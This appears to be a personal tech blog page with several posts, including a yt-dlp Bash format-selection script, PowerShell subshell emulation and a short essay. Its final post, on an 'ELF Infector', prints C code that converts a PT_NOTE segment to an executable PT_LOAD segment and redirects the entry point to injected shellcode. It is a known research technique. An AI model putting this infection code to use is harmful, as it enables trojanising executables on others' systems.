14 March 2025

Paranoia, Some, Not Too Much, Mostly for Good

It's an amateur mistake to cultivate a mindset where you extrapolate the potential ulterior motives of your neighbors and every person you meet rather than trying to see their better traits. 

The way I see it, when we construct mental models of other people that include potentially false ulterior motives, what we are often really doing is preempting reality altogether—giving ourselves a free ticket to avoid the ordeal of having to truly understand them. It is easy to be cynical and reflexive. But being overly cynical is a kind of intellectual laziness. It is much harder to deliberately take the time and effort to think critically and ground your reasoning in evidence.

Is it good to be aware that we are all biological creatures with primal instincts, capable of ill deeds? Yes, of course it is. Is it good to acknowledge that we are also capable of living civilly, rationally, and prosperously among one another? Also yes.

Discernment may be tricky. It might be difficult. But the world is a place worth understanding.

12 March 2025

yt-dlp Archiving, Improved

One annoying thing about YouTube is that, by default, some videos are now served in .webm format or use VP9 encoding. However, I prefer storing media in more widely supported formats like .mp4, which plays on more devices than .webm. I also prefer AVC1 (H.264) encoding inside the MP4, because it just works out of the box on OSX with QuickTime, which doesn't natively support VP9 (listed by yt-dlp as vp09). AVC1-encoded MP4s still seem more portable in general at the moment.

yt-dlp, the command-line audio/video downloader for YouTube videos, is a great project. But between the various codecs YouTube serves and the compatibility issues across video players, getting what you want out of yt-dlp can be a bit challenging:

$ yt-dlp -f "bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best" https://www.youtube.com/watch?v=dQw4w9WgXcQ

For example, the format selector above does not actually extract the best possible encodings for all YouTube URLs on my OSX machine.

This usually happens when a YouTube URL tries to serve a .webm file. If you use the above format flag to extract the best-quality mp4-compatible audio and video from a list of YouTube URLs, and one of those URLs serves a .webm file, yt-dlp won't error out, abort, or skip the URL. Instead, yt-dlp will generate improperly encoded video: .mp4 files that cannot be opened or played.

However, we can fix this problem without even bothering yt-dlp with a pull request, because yt-dlp lets us dump all of the audio and video formats available for any video with the -F flag:

$ yt-dlp -F "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
[youtube] Extracting URL: https://www.youtube.com/watch?v=dQw4w9WgXcQ
[youtube] dQw4w9WgXcQ: Downloading webpage
[youtube] dQw4w9WgXcQ: Downloading tv client config
[youtube] dQw4w9WgXcQ: Downloading player b21600d5
[youtube] dQw4w9WgXcQ: Downloading tv player API JSON
[youtube] dQw4w9WgXcQ: Downloading ios player API JSON
[youtube] dQw4w9WgXcQ: Downloading m3u8 information
[info] Available formats for dQw4w9WgXcQ:
ID  EXT   RESOLUTION FPS CH │   FILESIZE   TBR PROTO │ VCODEC          VBR ACODEC      ABR ASR MORE INFO
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
sb3 mhtml 48x27        0    │                  mhtml │ images                                  storyboard
sb2 mhtml 80x45        1    │                  mhtml │ images                                  storyboard
sb1 mhtml 160x90       1    │                  mhtml │ images                                  storyboard
sb0 mhtml 320x180      1    │                  mhtml │ images                                  storyboard
233 mp4   audio only        │                  m3u8  │ audio only          unknown             [en] Default
234 mp4   audio only        │                  m3u8  │ audio only          unknown             [en] Default
249 webm  audio only      2 │    1.18MiB   46k https │ audio only          opus        46k 48k [en] low, webm_dash
250 webm  audio only      2 │    1.55MiB   61k https │ audio only          opus        61k 48k [en] low, webm_dash
140 m4a   audio only      2 │    3.27MiB  130k https │ audio only          mp4a.40.2  130k 44k [en] medium, m4a_dash
251 webm  audio only      2 │    3.28MiB  130k https │ audio only          opus       130k 48k [en] medium, webm_dash
602 mp4   256x144     13    │ ~  2.04MiB   81k m3u8  │ vp09.00.10.08   81k video only
269 mp4   256x144     25    │ ~  3.95MiB  156k m3u8  │ avc1.4D400C    156k video only
160 mp4   256x144     25    │    1.78MiB   70k https │ avc1.4d400c     70k video only          144p, mp4_dash
...
//snipped

It turns out it's actually much better to first manually list the formats this way, use grep and awk to extract the best possible codecs for an mp4 file, and then run yt-dlp with the specifically related codecs for each video URL. Here's a Bash script to automate this process, which makes downloading stuff from YouTube easier, in my opinion:

#!/bin/bash

if [ -z "$1" ]; then
    echo "Usage: $0 <youtube_url>"
    exit 1
fi

url="$1"

processVideo() {
    local videoUrl="$1"

    echo "Fetching available formats for video: $videoUrl"
    formats=$(yt-dlp -F "$videoUrl")
    if [ $? -ne 0 ]; then
        echo "Error: Failed to fetch formats for $videoUrl. Is yt-dlp installed and the URL valid?"
        return
    fi

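    # Keep MP4 rows that use AVC1 (H.264). For each row, take the first field
    # ending in "k" (the TBR column), then sort by bitrate, highest first.
    videoFormat=$(echo "$formats" | grep 'mp4' | grep -E 'avc1' | \
    awk '{tbr=""; for (i=1; i<=NF; i++) if ($i ~ /k$/) {tbr=$i; break} print $1, tbr}' | \
    sort -k2 -nr | awk '{print $1}' | head -1)

    if [ -z "$videoFormat" ]; then
        echo "No AVC1 video format found, falling back to any MP4 format."
        # Skip audio-only rows, which can also contain the string "mp4".
        videoFormat=$(echo "$formats" | grep 'mp4' | grep -v 'audio only' | \
        awk '{tbr=""; for (i=1; i<=NF; i++) if ($i ~ /k$/) {tbr=$i; break} print $1, tbr}' | \
        sort -k2 -nr | awk '{print $1}' | head -1)
    fi

    # Same selection for audio: the M4A row with the highest bitrate.
    # Stopping at the first "k" field avoids sorting by the sample rate (ASR) column.
    audioFormat=$(echo "$formats" | grep 'm4a' | \
    awk '{tbr=""; for (i=1; i<=NF; i++) if ($i ~ /k$/) {tbr=$i; break} print $1, tbr}' | \
    sort -k2 -nr | awk '{print $1}' | head -1)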

    if [ -z "$videoFormat" ] || [ -z "$audioFormat" ]; then
        echo "Error: No compatible MP4 video or M4A audio formats found for $videoUrl!"
        return
    fi

    echo "Selected video format: $videoFormat [MP4 : AVC1 preferred]"
    echo "Selected audio format: $audioFormat [M4A : highest quality]"

    echo "Downloading video with yt-dlp..."
    yt-dlp --restrict-filenames \
    -f "${videoFormat}+${audioFormat}" \
    --merge-output-format mp4 "$videoUrl"

    if [ $? -ne 0 ]; then
        echo "Error: Failed to download video. Check the format IDs and URL."
    fi
}

isPlaylist() {
    if echo "$url" | grep -q "list="; then
        return 0 
    else
        return 1 
    fi
}

if isPlaylist; then
    echo "Processing playlist..."
    videoUrls=$(yt-dlp --flat-playlist --get-url "$url")

    if [ -z "$videoUrls" ]; then
        echo "Error: No videos found in the playlist. Is the URL correct?"
        exit 1
    fi

    for videoUrl in $videoUrls; do
        echo "Processing video: $videoUrl"
        processVideo "$videoUrl"
    done
else
    echo "Processing single video..."
    processVideo "$url"
fi

We grab the entire "available formats" table as input, storing it as plaintext in the $formats variable. We then grep $formats for 'mp4' listings, then grep again, further filtering for listings that use the AVC1 H.264 codec. If it doesn't find AVC1, we fall back to simply whatever is MP4 compatible. After filtering twice with grep, our list looks something like this:

269     mp4   256x144     30    | ~  1.71MiB  135k m3u8  | avc1.4D400C    135k video only
160     mp4   256x144     30    |  847.75KiB   66k https | avc1.4d400c     66k video only          144p, mp4_dash
230     mp4   640x360     30    | ~  7.14MiB  565k m3u8  | avc1.4D401E    565k video only
134     mp4   640x360     30    |    4.45MiB  353k https | avc1.4d401e    353k video only          360p, mp4_dash
18      mp4   640x360     30  2 | ≈  6.06MiB  481k https | avc1.42001E         mp4a.40.2       44k [en] 360p
232     mp4   1280x720    30    | ~ 30.28MiB 2396k m3u8  | avc1.64001F   2396k video only
//snipped
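
The two-step filter and its fallback can be tried offline on a few rows copied from the -F listing earlier in this post. This is only a sketch: selectMp4Rows is a hypothetical helper name, the sample tables are trimmed by hand, and excluding audio-only rows in the fallback is my own assumption about what "any MP4 format" should mean.

```shell
#!/bin/bash
# selectMp4Rows is a hypothetical helper used only for this demo.
selectMp4Rows() {
    local table="$1" rows
    # First choice: MP4 rows that use the AVC1 (H.264) codec.
    # grep exits non-zero when nothing matches; "|| true" keeps strict shells from aborting.
    rows=$(printf '%s\n' "$table" | grep 'mp4' | grep -E 'avc1' || true)
    if [ -z "$rows" ]; then
        # Fallback (assumption): any MP4 row that is not audio-only.
        rows=$(printf '%s\n' "$table" | grep 'mp4' | grep -v 'audio only' || true)
    fi
    printf '%s\n' "$rows"
}

# Hand-trimmed sample tables, not live yt-dlp output.
tableWithAvc1='602 mp4   256x144     13    │ ~  2.04MiB   81k m3u8  │ vp09.00.10.08   81k video only
269 mp4   256x144     25    │ ~  3.95MiB  156k m3u8  │ avc1.4D400C    156k video only
160 mp4   256x144     25    │    1.78MiB   70k https │ avc1.4d400c     70k video only          144p, mp4_dash'

tableWithoutAvc1='251 webm  audio only      2 │    3.28MiB  130k https │ audio only          opus       130k 48k [en] medium, webm_dash
602 mp4   256x144     13    │ ~  2.04MiB   81k m3u8  │ vp09.00.10.08   81k video only'

avc1Ids=$(selectMp4Rows "$tableWithAvc1" | awk '{print $1}' | paste -sd' ' -)
fallbackIds=$(selectMp4Rows "$tableWithoutAvc1" | awk '{print $1}' | paste -sd' ' -)

echo "AVC1 rows: $avc1Ids"
echo "Fallback rows: $fallbackIds"
```

With these samples, the first table keeps only the two AVC1 rows, and the second falls back to the VP9 row because it is the only MP4 video left.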

Then we use a for loop in awk, bounded by NF (the number of fields on the line), to walk through the fields and pick out the ID and TBR columns. The TBR column contains the bitrate. The ID is always the first field, and the bitrate is the first field the parser sees ending with a lowercase "k":

awk '{tbr=""; for (i=1; i<=NF; i++) if ($i ~ /k$/) {tbr=$i; break} print $1, tbr}'

At this point, our output looks something like this -- just a list of mp4 IDs and bitrates from our AVC1 list:

160 66k
230 565k
134 353k
232 2396k
//snipped

Afterward, we use sort to put the listing with the highest bitrate first, then awk and head -1 to print back only the ID of that listing:

sort -k2 -nr | awk '{print $1}' | head -1

Our final output is just 232, the ID, which is what we pass to yt-dlp for the video portion of the download.
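
To check the whole selection pipeline without touching the network, it can be run against the sample AVC1 rows shown above. This is a minimal sketch: pickHighestBitrateId is a hypothetical helper name, and the awk program stops at the first field ending in "k" so that the TBR column is used even on rows that also list a sample rate.

```shell
#!/bin/bash
# Sample rows copied from the filtered AVC1 listing above; not live yt-dlp output.
sampleRows='269     mp4   256x144     30    | ~  1.71MiB  135k m3u8  | avc1.4D400C    135k video only
160     mp4   256x144     30    |  847.75KiB   66k https | avc1.4d400c     66k video only          144p, mp4_dash
230     mp4   640x360     30    | ~  7.14MiB  565k m3u8  | avc1.4D401E    565k video only
134     mp4   640x360     30    |    4.45MiB  353k https | avc1.4d401e    353k video only          360p, mp4_dash
18      mp4   640x360     30  2 | ≈  6.06MiB  481k https | avc1.42001E         mp4a.40.2       44k [en] 360p
232     mp4   1280x720    30    | ~ 30.28MiB 2396k m3u8  | avc1.64001F   2396k video only'

# pickHighestBitrateId is a hypothetical helper name used only for this demo.
pickHighestBitrateId() {
    awk '{
        tbr = ""                                  # reset for every row
        for (i = 1; i <= NF; i++)
            if ($i ~ /k$/) { tbr = $i; break }    # first field ending in k is TBR
        print $1, tbr                             # emit "ID bitrate"
    }' | sort -k2 -nr | awk '{print $1}' | head -1
}

bestId=$(printf '%s\n' "$sampleRows" | pickHighestBitrateId)
echo "Best video format ID: $bestId"
```

On these rows the script prints 232, the 1280x720 listing with the 2396k bitrate.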

We repeat the process for the audio file listings by grepping for lines containing the m4a format extension. Again, we print the ID and TBR bitrate columns, sorting and extracting the related ID for the audio file with the highest bitrate.

We pass both the high quality video and audio IDs to yt-dlp for downloading. yt-dlp automagically merges these two files to produce a finalized MP4.

You could modify the grep and awk statements for any other preferred video format, but this Bash script works for downloading lectures I can natively watch and listen to on OSX.
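
As a possible alternative to parsing the table, yt-dlp's format filters support a "starts with" comparison (^=) on string fields such as vcodec, so the AVC1 preference might be expressible directly in the selector. The sketch below only prints the command as a dry run. The selector is my own guess at an equivalent, and I have not tested it against the URLs that produce broken files with the original selector.

```shell
#!/bin/bash
# Hypothetical alternative selector: prefer MP4 video whose codec string starts
# with "avc1", paired with M4A audio, then fall back as in the original command.
selector='bestvideo[ext=mp4][vcodec^=avc1]+bestaudio[ext=m4a]/best[ext=mp4]/best'

# Dry run: build and print the command rather than executing it,
# so nothing is downloaded. $videoUrl is left as a literal placeholder.
dryRunCommand="yt-dlp -f \"$selector\" --merge-output-format mp4 \"\$videoUrl\""
echo "$dryRunCommand"
```

If that selector behaves as hoped, it would replace the grep and awk steps, but the script above remains the version that is known to work here.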

10 March 2025

Subshells in PowerShell

Previously, I wrote a post about how it's possible to create a "subshell" in Windows analogous to the subshell feature available in Bash on Linux, because Microsoft Windows doesn't have native subshell capability the way Linux does. The script below improves on that earlier .NET System.Diagnostics trick, and this new version correctly redirects the standard output:

$x = New-Object System.Diagnostics.ProcessStartInfo
$x.FileName = "cmd.exe"
$x.Arguments = "/c echo %PATH%"
$x.UseShellExecute = $false
$x.RedirectStandardOutput = $true  
$x.EnvironmentVariables.Remove("Path")
$x.EnvironmentVariables.Add("PATH", "C:\custom\path")
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $x
$p.Start() | Out-Null
$output = $p.StandardOutput.ReadToEnd()
$p.WaitForExit()
Write-Output $output
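
For comparison, here is a small sketch of the Bash behavior the script above imitates: a command substitution runs in a subshell, so a PATH change made inside it does not leak back into the parent shell. The variable names and /custom/path are illustrative assumptions.

```shell
#!/bin/bash
originalPath="$PATH"

# $( ... ) runs its body in a subshell. PATH is changed only in there.
# printf is a shell builtin, so it still works with the custom PATH.
subshellPath=$(
    PATH="/custom/path"
    printf '%s' "$PATH"
)

echo "Inside subshell: $subshellPath"

# Back in the parent shell, PATH is still what it was before.
if [ "$PATH" = "$originalPath" ]; then
    echo "Parent PATH unchanged"
fi
```

The PowerShell version gets the same isolation by starting a separate process with its own copy of the environment.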

Real-World Example

$customPath2 = "C:\custom\path\2"

$data = @{
    Path = $customPath2  
    Timestamp = Get-Date
    ProcessID = $PID  
}

$x = New-Object System.Diagnostics.ProcessStartInfo
$x.FileName = "cmd.exe"
$x.Arguments = "/c echo %PATH%"
$x.UseShellExecute = $false
$x.RedirectStandardOutput = $true
$x.RedirectStandardError = $true

$x.EnvironmentVariables.Remove("Path")
$x.EnvironmentVariables.Add("PATH", $customPath2)

$p = New-Object System.Diagnostics.Process
$p.StartInfo = $x
$p.Start() | Out-Null

$output = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd() 
$p.WaitForExit()

$data["SubshellOutput"] = $output
$data["SubshellError"] = $stderr

$data
> $data

Name                           Value
----                           -----
ProcessID                      11852
Path                           C:\custom\path\2
SubshellOutput                 C:\custom\path\2...
SubshellError
Timestamp                      3/10/2025 7:05:01 PM

03 March 2025

Ambiph.one

Today I learned about ambiph.one. This website is a minimalist ambient sound mixer for working, studying, or relaxing. Moreover, all the sounds are either public domain or Creative Commons licensed. I've been using it while reading and writing code this Monday. Very neat.

02 March 2025

ELF Infector

Recently I wrote a blog post about infecting Executable and Linkable Format files on Linux. Specifically, a method that works on the latest Ubuntu 24.04.1 by altering PT_NOTE segments to PT_LOAD segments. You can find the source code here and a proof of concept demo on YouTube below:


    // Look for PT_NOTE section
    for (int i = 0; i < elf_header->e_phnum; i++) {
        if (program_headers[i].p_type == PT_NOTE) {
            // Convert to a PT_LOAD section with values to load shellcode
            printf("[+] Found PT_NOTE section\n");
            printf("[+] Changing to PT_LOAD\n");
            program_headers[i].p_type = PT_LOAD;
            program_headers[i].p_flags = PF_R | PF_X;
            program_headers[i].p_offset = file_offset;
            program_headers[i].p_vaddr = memory_offset;
            program_headers[i].p_memsz += sc_len;
            program_headers[i].p_filesz += sc_len;
            // Patch the ELF header to start at the shellcode
            elf_header->e_entry = memory_offset;
            printf("[+] Patched e_entry\n");
            break;
        }
    }

    // Patch shellcode to jump to the original entry point after finishing
    patch(&shellcode, &shellcode_len, elf_header->e_entry, original_entry);